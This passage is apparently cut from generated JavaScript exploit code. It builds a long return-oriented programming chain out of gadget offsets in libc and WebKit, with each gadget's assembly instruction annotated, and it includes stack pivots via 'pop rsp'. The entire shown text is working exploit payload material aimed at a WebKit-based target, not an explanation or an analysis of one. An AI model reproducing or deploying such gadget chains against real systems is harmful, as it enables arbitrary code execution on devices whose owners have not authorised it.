cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+244280, //L4432 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+244296, //L4433 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4432: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4433: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+244472, //L4435 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+244488, //L4436 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+244456, //L4434 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4434: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4435: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4436: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+244632, //L4439 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+244648, //L4440 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+244600, //L4437 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4437: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4438: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L4439: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4440: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+244720, //L4441 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4441: db([0, 0]); // 0x0 //L4413: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+244848, //L4444 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+244864, //L4445 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+244832, //L4443 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4443: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4444: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4445: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+244976, //L4447 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+245024, //L4450 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+244992, //L4448 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4447: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4448: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4449: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4450: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+245136, //L4451+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+245128, //L4451 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4451: db([0, 0]); // 0x0 set_gadgets([ ropchain+245152, //L4451+24 ropchain+247176, //L4446 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+245192, //L4452 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4452: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4453: db([120, 0]); // 0x78 set_gadget(libc_base+144605,); //pop rdi //L4454: db([120, 0]); // 0x78 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+245384, //L4458 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+245352, //L4456 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+245368, //L4457 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4455: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L4456: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4457: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4458: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+245440, //L4460 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L4460: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+245568, //L4462 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+245584, //L4463 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+245552, //L4461 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4461: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4462: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4463: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+245680, //L4465 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+245664, //L4464 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4464: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4465: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+245760, //L4466 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4466: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4468: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+245880, //L4471 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+245864, //L4469 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4469: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4471: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+246024, //L4474 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+245992, //L4472 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+246008, //L4473 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4472: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4473: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4474: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+246096, //L4476 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4476: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+246152, //L4477 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4477: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+246232, //L4479 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4479: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4481: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+246352, //L4484 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+246336, //L4482 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4482: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4484: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+246496, //L4487 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+246464, //L4485 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+246480, //L4486 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4485: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4486: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4487: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+246584, //L4489 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L4488: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L4489: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+246640, //L4490 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4490: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4492: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+246720, //L4494 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4494: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+246824, //L4495 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+246840, //L4496 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4495: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4496: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+246928, //L4498 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4498: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+246984, //L4499 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4499: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+247056, //L4502 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4502: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+247112, //L4503 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4503: db([0, 0]); // 0x0 set_gadgets([ webkit_base+1121481, //mov [rax], cl libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+782311, //pop rsp ropchain+258080, //L4505 //L4446: libc_base+764760, //pop rsi ropchain+247216, //L4506 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4506: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4508: db([72, 0]); // 0x48 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+247336, //L4511 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+247320, //L4509 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4509: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4511: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+247512, //L4514 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+247528, //L4515 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+247480, //L4512 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+247496, //L4513 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4512: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4513: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4514: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4515: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+247688, //L4519 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+247656, //L4517 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+247672, //L4518 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4516: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4517: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4518: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4519: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+247792, //L4521 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+247776, //L4520 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4520: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4521: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+247888, //L4523 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4522: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4523: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4524: db([16, 0]); // 0x10 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+247992, //L4525 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+248008, //L4526 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4525: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4526: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+248176, //L4528 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+248192, //L4529 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+248160, //L4527 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4527: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4528: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4529: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+248352, //L4534 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+248368, //L4535 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+248304, //L4531 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4531: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4532: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L4533: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4534: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4535: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+248480, //L4536+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+248472, //L4536 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4536: db([0, 0]); // 0x0 set_gadgets([ ropchain+248496, //L4536+24 ropchain+249536, //L4530 libc_base+764760, //pop rsi ropchain+248536, //L4537 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4537: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4539: db([96, 0]); // 0x60 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+248656, //L4542 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+248640, //L4540 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4540: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4542: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+248832, //L4545 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+248848, //L4546 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+248800, //L4543 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+248816, //L4544 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4543: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4544: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4545: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4546: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+248944, //L4548 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+248928, //L4547 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4547: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4548: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L4549: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L4550: db([5, 0]); // 0x5 set_gadget(libc_base+763368,); //pop rcx //L4551: db([5, 0]); // 0x5 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+249144, //L4553 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4553: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+249200, //L4554 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4554: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+249336, //L4558 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+249320, //L4557 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4556: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4557: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4558: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+249424, //L4559 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+249456, //L4561 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4559: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4560: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4561: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+249528, //L4562 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4562: db([0, 0]); // 0x0 //L4530: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+249656, //L4565 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+249672, //L4566 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+249640, //L4564 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4564: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4565: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4566: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+249832, //L4571 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+249848, //L4572 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+249784, //L4568 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4568: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4569: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L4570: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4571: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4572: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+249960, //L4573+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+249952, //L4573 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4573: db([0, 0]); // 0x0 set_gadgets([ ropchain+249976, //L4573+24 ropchain+250928, //L4567 libc_base+764760, //pop rsi ropchain+250016, //L4574 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4574: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4576: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+250136, //L4579 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+250120, //L4577 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4577: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4579: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+250280, //L4582 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+250248, //L4580 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+250264, //L4581 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4580: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4581: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4582: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+250376, //L4584 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4583: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4584: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4585: db([32, 0]); // 0x20 set_gadgets([ libc_base+848070, //shl rax, cl 